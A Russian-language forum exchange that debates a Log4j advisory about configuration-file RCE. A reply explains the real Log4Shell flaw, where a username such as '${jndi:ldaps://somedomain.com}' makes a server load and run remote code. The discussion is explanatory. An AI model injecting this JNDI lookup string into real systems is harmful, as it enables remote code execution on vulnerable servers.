Я всегда рассматривал конфигурации программы как часть исходного кода программы. Пусть и написанную на специфическом декларативном языке. Код конфигурации пишет программист. Конфигурация структурирована специальным образом. Она меняет поведение программы, или даже добавляет новые фичи которых раньше небыло.
Описание уязвимости в Log4j:
Apache Log4j2 are vulnerable to a remote code execution attack where an attacker with permission to modify the logging configuration file
Я читаю как: если атакующий может модифицировать исходный код вашего проекта, то он может добавить в исходных код вашего проекта свой код. Логично! Это свойство исходного кода. Если вы его можете править, то вы можете добавить в исходный код, любой код. В математике эта гениальная фраза записывается как 0 = 0. Лили 1 = 1 и т.п.
Что это. Программисты настолько деградировали, что не понимают что список языков программирования не ограничивается Java, JavaScript и Python, и все что способно менять поведение компьютера является языком программирования. И следует ожидать уязвимостей вида: в Bash скриптах обнаружен уязвимость. Если хакер может вносить произвольные правки в Bash скрипты на вашем компютере, то это ведет с потенциальному RCE. Надо срочно обновить Bash чтобы запретить bash-скриптам выполнять какие-либо действия.
Или я настолько деградировал на текущей работе — что не понимаю чего-то важного?
Ты что-то не то читаешь. Суть уязвимости с log4j была в том, что ты пишешь в программе
logger.info("User {} logged in", user.name);. Пользователь регистрируется со специальным именем
${jndi:ldaps://somedomain.com} и твой сервер загружает и выполняет определённый код с somedomain.com.
Наверное ты про какие-то другие уязвимости читаешь, менее важные. Там как начали в него пристально глядеть, много повылазило.